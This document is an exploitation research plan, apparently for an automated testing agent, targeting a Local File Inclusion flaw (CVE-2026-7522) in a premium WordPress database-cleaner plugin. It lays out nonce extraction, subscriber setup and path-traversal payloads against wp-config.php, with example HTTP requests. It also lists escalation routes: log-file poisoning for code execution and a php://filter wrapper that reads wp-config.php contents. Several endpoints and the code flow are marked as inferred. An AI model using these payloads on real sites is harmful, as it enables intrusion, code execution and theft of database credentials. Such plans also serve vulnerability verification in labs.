Exploitation Research Plan: CVE-2026-7522 (Advanced Database Cleaner – Premium LFI)

1. Vulnerability Summary

The Advanced Database Cleaner – Premium plugin (versions <= 4.1.0) contains a Local File Inclusion (LFI) vulnerability. The flaw exists because the plugin fails to properly sanitize or validate a user-supplied file path provided via the template parameter before passing it to a PHP include() or require() statement. Authenticated users with Subscriber-level permissions can exploit this to include and execute arbitrary PHP files located on the server.

2. Attack Vector Analysis

• Endpoint: Likely an AJAX action or an admin page handler. (Inferred: wp-admin/admin-ajax.php or wp-admin/admin.php)
• Action/Hook: Research indicates the plugin uses various admin views. The vulnerability is tied to how the plugin loads these views/templates.
• Vulnerable Parameter: template
• Authentication: Subscriber level or higher (Authenticated).
• Preconditions: The attacker must be logged in. To achieve Remote Code Execution (RCE), they must find a way to upload a .php file (e.g., via a different plugin or media upload) or include an existing sensitive file.

3. Code Flow (Inferred)

1. Entry Point: An authenticated request is made to an admin-related endpoint (e.g., admin-ajax.php or admin.php?page=advanced-db-cleaner...).
2. Processing: The plugin identifies a request to load a specific "template" or "view."
3. Vulnerable Code:

   // Example of a likely vulnerable pattern in the plugin
   $template = $_REQUEST['template']; 
   // ... missing or insufficient sanitization (e.g., no realpath check or whitelist) ...
   include( $plugin_path . '/includes/' . $template ); 
   

4. Sink: The include() function executes the file pointed to by the manipulated template parameter. By using path traversal (../), an attacker can move outside the intended directory.

4. Nonce Acquisition Strategy

If the vulnerable action is an AJAX handler, it likely requires a nonce.

1. Identify Nonce Location: Premium versions of this plugin often localize nonces in the admin dashboard.
2. Login as Subscriber: Use wp user create and wp user password to set up a subscriber.
3. Locate JS Variable: Search the dashboard source for wp_localize_script.
   • Grep Suggestion: grep -r "wp_localize_script" .
4. Extraction via Browser:
   • Navigate to the WordPress dashboard as the subscriber.
   • Use browser_eval to find the nonce.
   • Target Variables (Inferred): window.adbc_vars?.nonce or window.a_db_c_vars?.nonce.

5. Exploitation Strategy

The goal is to demonstrate LFI by including a file that produces observable output or by including wp-config.php (which will execute but usually return a blank screen, though it confirms the file was found).

Step 1: Discover the Action and Nonce

If the LFI is in an AJAX handler:

• Identify the wp_ajax_ action string (e.g., a_db_c_load_template).
• Extract the associated nonce.

Step 2: Formulate the LFI Payload

Since the plugin likely appends .php, the payload should target existing .php files.

• Payload: ../../../../wp-config.php (The .php extension may be automatically appended by the plugin, so the payload would be ../../../../wp-config).

Step 3: Execute the Request

Use the http_request tool.

Example Request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=[INFERRED_ACTION]&nonce=[EXTRACTED_NONCE]&template=../../../../wp-config

Note: If the include is via a GET request on an admin page:

GET /wp-admin/admin.php?page=advanced-db-cleaner&template=../../../../wp-config HTTP/1.1

6. Test Data Setup

1. Install Plugin: Ensure advanced-database-cleaner-premium v4.1.0 is installed and active.
2. Create Subscriber:

   wp user create attacker attacker@example.com --role=subscriber --user_pass=password123
   

3. Create a Canary File: To prove RCE/LFI definitively, create a dummy PHP file in the uploads directory:

   echo "<?php echo 'LFI_SUCCESS'; ?>" > /var/www/html/wp-content/uploads/canary.php
   

7. Expected Results

• Success (Canary): The HTTP response body contains LFI_SUCCESS.
• Success (wp-config): If including wp-config.php, the response may be a 200 OK with an empty body (since wp-config.php defines constants but doesn't produce output), whereas an invalid path would result in a PHP warning/error or a 404.
• Error Indicators: Look for "Failed to open stream" or "No such file or directory" in the response if WP_DEBUG is on.

8. Verification Steps

1. Check PHP Error Logs: If the request returns a 500 error, check the logs to see the full path the plugin attempted to include:

   tail -n 20 /var/log/apache2/error.log
   

2. Audit Source: Use the agent to find the exact line in the plugin:

   grep -rn "include" . | grep "template"
   

9. Alternative Approaches

• Log File Inclusion: If the attacker can control the User-Agent or other logged data, they can target /var/log/apache2/access.log to achieve RCE.
• Null Byte Injection: If the WordPress environment is running an ancient version of PHP (< 5.3.4), a null byte %00 might be used to bypass forced extensions, but this is unlikely in modern environments.
• Wrapper Inclusion: Try PHP wrappers like php://filter/convert.base64-encode/resource=../../../../wp-config.php to read the contents of files instead of executing them.